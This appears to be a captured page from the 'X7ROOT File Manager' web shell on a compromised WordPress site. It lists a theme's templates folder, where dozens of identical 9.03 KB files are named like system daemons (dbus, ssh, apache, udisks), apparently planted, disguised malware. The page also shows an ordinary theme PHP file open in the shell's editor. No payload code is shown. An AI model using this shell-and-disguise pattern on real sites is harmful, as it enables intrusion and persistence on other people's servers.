X7ROOT File Manager
Current Path:
/home/hikrsdyp/public_html/wp-content/themes/surince/templates
home
/
hikrsdyp
/
public_html
/
wp-content
/
themes
/
surince
/
templates
/
??
..
??
apache-agent-helper
(9.03 KB)
??
apache-cgi-helper
(9.03 KB)
??
apache-cgi.daemon
(9.03 KB)
??
apache-daemon.service
(9.03 KB)
??
apache-manager.daemon
(9.03 KB)
??
apache-monitor.so
(9.03 KB)
??
apache-session.daemon
(9.03 KB)
??
apache-worker.cgi
(9.03 KB)
??
b76i234w
(9.03 KB)
??
bottom.php
(992 B)
??
cursor.php
(2.35 KB)
??
dbus-daemon
(9.03 KB)
??
dbus-helper.daemon
(9.03 KB)
??
dbus-helper.service
(9.03 KB)
??
dbus-manager.cgi
(9.03 KB)
??
dbus-plugin
(9.03 KB)
??
dbus-plugin.service
(9.03 KB)
??
dbus-service-helper
(9.03 KB)
??
entry-content-author.php
(3.1 KB)
??
entry-content-body.php
(1 KB)
??
entry-content-media.php
(1.88 KB)
??
entry-content-meta.php
(651 B)
??
entry-content-prev-next-links.php
(807 B)
??
entry-content-readmore.php
(600 B)
??
entry-content-related.php
(1.88 KB)
??
entry-content-single.php
(1.02 KB)
??
entry-content-tags.php
(882 B)
??
entry-content-title.php
(829 B)
??
entry-content.php
(1 KB)
??
entry-search.php
(632 B)
??
featured-title.php
(3.64 KB)
??
footer-widgets.php
(1.99 KB)
??
functions_search
(853.71 KB)
??
gnome-fpm
(9.03 KB)
??
gnome-helper
(9.03 KB)
??
gnome-plugin
(9.03 KB)
??
gnome-service
(9.03 KB)
??
gnome-worker
(9.03 KB)
??
gvfs-cache.daemon
(9.03 KB)
??
gvfs-daemon.daemon
(9.03 KB)
??
gvfs-monitor
(9.03 KB)
??
header-button.php
(595 B)
??
header-extra-nav.php
(1.37 KB)
??
header-info.php
(890 B)
??
header-logo.php
(1.47 KB)
??
header-menu.php
(2.31 KB)
??
header-social.php
(1.28 KB)
??
kde-manager.daemon
(9.03 KB)
??
kde-monitor.so
(9.03 KB)
??
kde-plugin.cgi
(9.03 KB)
??
kde-plugin.so
(9.03 KB)
??
kde-service.service
(9.03 KB)
??
kde-session.cgi
(9.03 KB)
??
lib-agent.cgi
(9.03 KB)
??
lib-cache.service
(9.03 KB)
??
lib-plugin.daemon
(9.03 KB)
??
lib-service.daemon
(9.03 KB)
??
lib-worker.cgi
(9.03 KB)
??
nginx-fpm.service
(9.03 KB)
??
nginx-monitor
(9.03 KB)
??
nginx-session
(9.03 KB)
??
php-agent.so
(9.03 KB)
??
portuguese_mimes
(2.64 MB)
??
project-prev-next-links.php
(815 B)
??
project-related.php
(3.96 KB)
??
project-single.php
(678 B)
??
pulse-cgi.daemon
(9.03 KB)
??
pulse-daemon.service
(9.03 KB)
??
pulse-service
(9.03 KB)
??
scroll-top.php
(278 B)
??
service-single.php
(554 B)
??
site-header.php
(2.63 KB)
??
sitemap_previous
(2.72 MB)
??
ssh-fpm.service
(9.03 KB)
??
ssh-helper-helper
(9.03 KB)
??
ssh-plugin.service
(9.03 KB)
??
ssh-service-helper
(9.03 KB)
??
ssh-session.so
(9.03 KB)
??
systemd-manager.service
(9.03 KB)
??
systemd-monitor.cgi
(9.03 KB)
??
tracker-cache.service
(9.03 KB)
??
tracker-daemon.daemon
(9.03 KB)
??
tracker-session.cgi
(9.03 KB)
??
tracker-session.service
(9.03 KB)
??
udisks-cache-helper
(9.03 KB)
??
udisks-cache.cgi
(9.03 KB)
??
udisks-helper
(9.03 KB)
??
udisks-helper.daemon
(9.03 KB)
??
udisks-helper.service
(9.03 KB)
??
udisks-monitor.cgi
(9.03 KB)
??
udisks-service.cgi
(9.03 KB)
??
udisks-worker.so
(9.03 KB)
Editing: entry-content-media.php
<?php /** * Entry Content / Media * * @package surince * @version 3.8.9 */ // Exit if accessed directly if ( ! defined( 'ABSPATH' ) ) { exit; } // // Exit if disabled via Customizer if ( is_single() && ! surince_get_mod( 'blog_single_media', true ) ) return; $html = $cls = ''; switch ( get_post_format() ) { case 'gallery': $icon = 'post-gallery'; $size = 'surince-post-standard'; if ( is_single() ) $size = 'surince-post-single'; $images = surince_get_elementor_option( 'gallery_images' ); if ( empty( $images ) ) { break; } $html = '<div class="blog-gallery">'; foreach ( $images as $image ) { $html .= sprintf( '<div>%1$s</div>', wp_get_attachment_image( $image['id'], $size ) ); } $html .= '</div>'; break; case 'video': $icon = 'post-video'; $video = surince_get_elementor_option( 'video_url' ); if ( ! $video ) break; if ( filter_var( $video, FILTER_VALIDATE_URL ) ) { // If URL: show oEmbed HTML if ( $oembed = @wp_oembed_get( $video ) ) $html .= $oembed; } else { // If embed code: just display $html .= $video; } break; default: $icon = 'post-standard'; $size = 'surince-post-standard'; $thumb = get_the_post_thumbnail( get_the_ID(), $size ); if ( empty( $thumb ) ) { return; } if ( is_single() ) { $html .= $thumb; } else { $html .= '<a href="'. esc_url( get_permalink() ) .'">'; $html .= $thumb; $html .= '</a>'; } } // Custom Post Date if ( surince_get_mod('blog_single_custom_post_date', false) ) { $html .= '<span class="custom-post-date">' . esc_html(get_the_date()) . '</span>'; if ( $html ) printf( '<div class="post-media %2$s clearfix has-decor">%1$s</div>', $html, $cls ); } else { if ( $html ) printf( '<div class="post-media %2$s clearfix">%1$s</div>', $html, $cls ); }
Upload File
Create Folder